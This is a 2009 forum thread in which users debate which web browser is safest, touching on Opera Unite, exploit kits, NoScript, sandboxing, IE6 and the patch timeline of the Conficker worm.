I agree there was much hype in the media about that contest, for example, that neglected quite a few important details, including limits to the usefulness of any knowledge gained from such events.
-{ Quote: "So much for (some) security professionals.
You need to be alert and discriminating in what you read." }-
No doubt.
innerpeace
May 8th, 2009, 01:04 AM
-{ Quote: "I prefer the phrase, "exploit in the wild" because there are many reported vulnerabilities that never become exploits in the wild. It's just my way of distinguishing what is in the wild and what is not. It's not that I don't pay attention to vulnerabilities, I just don't get too excited about them...
I'm not aware of any exploits in the wild that target code in Opera or Firefox. I can't speak for other browsers." }-
Thanks for your reply Rich. You make a good point about "Exploit in the wild" and it makes sense. It also makes sense to focus on them as they are the real and current threat/s.
If you do hear of any browser-only exploits in the wild please let us know.
Regards,
IP
ParadigmShift
May 8th, 2009, 02:48 PM
Over the years when it comes to malware prevention, I've found a lot of power lies within the browser itself. A good web filter helps too. ;)
Kye-U
May 10th, 2009, 04:57 PM
In my opinion, Lynx is the safest browser (since it's text-only).
Almost all browsers in mainstream use are vulnerable in some shape or form, be it JavaScript, malicious image files (WMF, ANI), Flash, etc. Basically, the more "media-rich" the browser, the more attack vectors there are.
I use Opera, Firefox and Chromium equally, all with Proxomitron. I liked the functionality of NoScript in Firefox so much that I felt I needed the same protection in Opera and Chromium (and other browsers), so I wrote a Proxomitron filter for this purpose.
MrBrian
May 13th, 2009, 07:53 PM
Test Center: How secure is Firefox? (http://www.infoworld.com/d/security-central/test-center-how-secure-firefox-282?page=0,0)
Test Center: How secure is Opera? (http://www.infoworld.com/d/security-central/test-center-how-secure-opera-620?page=0,0)
Test Center: How secure is Google Chrome? (http://www.infoworld.com/t/applications/test-center-how-secure-google-chrome-443?page=0,0)
Test Center: How secure is Internet Explorer? (http://www.infoworld.com/d/applications/test-center-how-secure-internet-explorer-343)
Test Center: How secure is Safari? (http://www.infoworld.com/d/security-central/test-center-how-secure-safari-228)
38J
May 13th, 2009, 08:29 PM
The safest browser is the person operating the computer - if he / she wants to be! :dry:
MrBrian
June 21st, 2009, 12:02 AM
-{ Quote: "I'm not aware of any exploits in the wild that target code in Opera or Firefox." }-
From http://www.viruslist.com/en/analysis?pubid=204792056:
-{ Quote: "Malware exploit kits serve as the engine for drive-by downloads. These kits are professionally written software components that can be hosted on a server with a database backend. The kits, which are sold on underground hacker sites, are fitted with exploits for vulnerabilities in a range of widely deployed desktop applications, including Apple’s QuickTime media player, Adobe Flash Player, Adobe Reader, RealNetworks’ RealPlayer, and WinZip.
Browser-specific exploits have also been used, targeting Microsoft’s Internet Explorer, Mozilla’s Firefox, Apple Safari, and Opera. Several targeted exploit kits are fitted only with attack code for Adobe PDF vulnerabilities or known flaws in ActiveX controls." }-
From http://tech.yahoo.com/news/pcworld/20090620/tc_pcworld/couldoperaunitebeabotmastersbestfriend:
-{ Quote: "Opera attack code is already included in the majority of browser attack tools that Jackson has studied. With Unite, he expects the hackers who write browser attack software to pay even more attention to Opera. "I think there will be a push to keep your exploit kit in marketable condition by developing exploits for Opera 10," he said." }-
chrisretusn
June 21st, 2009, 12:33 AM
There is no such thing as the safest browser.
Use the browser you like, learn how to use it and surf smart. Putting a browser in a sandbox does not make the browser more safe; it simply adds a layer of protection to a browser that may have security holes.
Threads like this really accomplish nothing.
Rmus
June 21st, 2009, 01:10 AM
Thanks for the references.
-{ Quote: "From http://www.viruslist.com/en/analysis?pubid=204792056:" }-
I wish the author would have shown an exploit pack with an Opera exploit. His example (Mpack I think) is the most common pack for sale, and contains just the usual IE stuff. I'm left wondering what the specific exploits used against the other browsers were. All previous vulnerabilities for Firefox and Opera have been patched.
This will bear watching...
-{ Quote: "From http://tech.yahoo.com/news/pcworld/20090620/tc_pcworld/couldoperaunitebeabotmastersbestfriend:" }-
Opera Unite has caused a furor already - this Platform is a disaster waiting to happen.
If this is a "feature" that won't be optional, I know several people who have indicated they would abandon Opera.
rich
Windchild
June 21st, 2009, 03:58 AM
I don't know what the safest browser is, but I'm happy with Opera. It, as of now, isn't so insecure it would bother me, and yet it has a rich set of features for actual web browsing that I like that I can find on no other browser (at least not without planting a ton of extensions on the browser).
-{ Quote: "Test Center: How secure is Opera? (http://www.infoworld.com/d/security-central/test-center-how-secure-opera-620?page=0,0)" }-
The articles appear to be outdated. Opera 9.64 supports DEP and ASLR. Which, by the way, don't do nearly as much as the article seems to imply. Good technologies, sure, but they don't have nearly as great an impact as being able to control scripting and plugins for each site and setting a default disabled for both - which is something you can't do with, say, Firefox, without extensions like NoScript.
-{ Quote: "I wish the author would have shown an exploit pack with an Opera exploit. His example (Mpack I think) is the most common pack for sale, and contains just the usual IE stuff. I'm left wondering what the specific exploits used against the other browsers were. All previous vulnerabilities for Firefox and Opera have been patched." }-
If you are prone to being cynical, like I am, you might note the source of the article - viruslist.com or in other words Kaspersky. AV companies don't exactly have a clean track record of telling things like they are and not partaking in hype and FUD. My general rule of BS dictates that whenever an AV company claims that something is exploitable and indeed being exploited now, but doesn't offer any kind of reference or proof at all, not even one tiny example, they're either lying or greatly exaggerating to market their own AV products as necessary.
As for exploit packs in general, all that I have seen will use perhaps a couple of the latest ones and mostly very old ones (months, even years old). Most of the exploits will be against IE, of course. If there is an Opera exploit in there - never seen one actually in the wild, same as you - it will almost certainly be one that was patched months ago.
-{ Quote: "This will bear watching...
Opera Unite has caused a furor already - this Platform is a disaster waiting to happen.
If this is a "feature" that won't be optional, I know several people who have indicated they would abandon Opera." }-
I am one of those people who will jump ship if Opera doesn't toss "Unite" or at least give me a version that does not have Unite built-in. I just don't want anything like that, ever. It is a security disaster waiting to happen, no matter how they may have tried to sandbox it. Not to mention that it is incredible bloat. If I want a web server, I will run Apache. I want my browser to be a browser, not a server.
Edward_Stream
July 29th, 2009, 10:19 AM
For me Firefox is the safest. Mozilla Firefox plus an AV solution is the best, preferably with an anti-spam toolbar.
OnSeeker
July 29th, 2009, 10:29 AM
My favorite browser is Mozilla! It has all the features that can satisfy me and also a lot of useful plug-ins that integrate perfectly into it!
Keyboard_Commando
July 29th, 2009, 12:17 PM
Anything inside Sandboxie (cliche/fanboyism I know)
I like Opera ... be nice if Opera had Add Ons, NoScript for the win!
I often see people saying they're still using IE6 and how it's never let them down ... makes me wonder if there is some esoteric thing going on like the rest of us don't know what we're missing.
http://news.zdnet.co.uk/security/0,1000000189,39693874,00.htm
But when I find out the majority of British Ministry of Defense still uses IE6 I know this is just a horrible mistake just waiting to happen. Ughhh
tipstir
July 29th, 2009, 02:34 PM
Firefox 3.5.1 plus security add-on. Plus a lot of these others like Chrome, Opera and Safari, which I did try and found only Opera to work with adsweep.js. Opera 9.6 had crashed more and can't load certain pages, like QVC, which doesn't like Opera. I upgraded to Opera 10 beta (I know it's still in beta) but adsweep.js failed, then ads pop up like mad. Still, right now Firefox with Vista Aero themes is the closest to IE7 features. Firefox has virus defs from Avira, everything is scanned, security seems okay, but I still run the browser in an isolated sandbox using GeSWall and KeyScrambler with it. Added SpywareBlaster. Again, not a lot of stuff works with Opera.
Rmus
July 29th, 2009, 08:20 PM
-{ Quote: "I often see people saying they're still using IE6 and how it's never let them down ... makes me wonder if there is some esoteric thing going on like the rest of us don't know what we're missing." }-
Nothing esoteric at all -- just users understanding how to secure the browser.
I've got IE6 installed on both my Win2K and WinXP systems. IE is not my primary browser, but up until recently, I used to browse with it from time to time to see if I could randomly pick up some web-based exploit that was going around. I never found anything. It made me wonder how it is that people pick up these infected pages!
I keep my IE6 unpatched so that when I see malicious URLs posted in exploit notifications, I go to the site to test other security and the exploit always fails.
If you look at the malware packages that contain IE6 exploits, you find they are all long-since patched. The multitude of people who are infected by an IE exploit don't patch, don't have other security in place to block remote code execution exploits in case of a 0-day scenario.
The Conficker fiasco is a good example: The MS08-067 patch, which addressed the vulnerability which the Conficker worm later exploited, was released in October 2008:
Microsoft Security Bulletin MS08-067 – Critical
http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
The first exploit of that vulnerability occurred one month later:
ms08-067 exploitation
http://isc.sans.org/diary.html?storyid=5288
-{ Quote: "we've caught an MS08-067 exploitation attempt and provide the trace and a brief analysis here:" }-
Conficker, aka W32.Downadup.B, arrived in December, two months after the patch:
MS08-067 Worm on the Loose
http://isc.sans.org/diary.html?storyid=5596
-{ Quote: "Symantec has identified W32.Downadup.B as a new worm that is spreading by taking advantage of the RPC vulnerability from MS08-067." }-
Is this the fault of the browser or the user?
Opera and Firefox have a long list of vulnerabilities that become patched. That is no help unless the user updates. It's no different than with IE. Opera and Firefox users tend to be more security-aware. This, of course, is the minority of browser users world-wide.
People say, Give the average user Firefox. Unless this average user learns to configure Firefox properly and learns how to use the extensions, plugins, etc, Firefox is no more secure than IE against the multitude of exploits that are targeting Acrobat, Foxit, Flash and the like. All of these attacks are triggered by JavaScript in the exploit code, so that any of these three browsers, if not properly configured, is susceptible to being the trigger for these exploits.
Now, the story you link to refers to institutions using IE6. Here, we are in a different world since you are dealing with multiple users on a network, and who knows how each individual system/browser is secured. But this is not the fault of the browser: it's user error.
And so you get quotes such as this from the article:
-{ Quote: "So to force them to use the most decrepit browser in the world is a rare form of workplace cruelty that should be stopped." }-
What silly nonsense. The article should state:
Because organizations are often slow to patch and have no security in place that locks down the systems against unwanted executables, and because there is no control over how individual users configure the browser (scripting, etc), companies should switch to a different browser to insure against user incompetence and IT negligence.
IE6 is a fine browser - light and fast. The principal reason I switched to Opera back in Win9x days is that I prefer its features and configurable *.ini files. I never thought much about the security aspect back then. Later, I echoed the growing criticisms of IE until I started looking more closely beneath the surface of things.
----
rich
Keyboard_Commando
August 1st, 2009, 10:09 AM
Rmus, yes it would have been nice to hear a politician care more for the security of the nation they represent rather than the choice to use the latest cool browser. Allowing civil servants in government depts to use whichever browser they wish to is a recipe for disaster, surely?
I have been reading about this Opera Unite (http://unite.opera.com/) service. This sounds potentially like a disaster. Exploiters' heaven!
Definitely seems like some gimmick to attract the kids to Opera.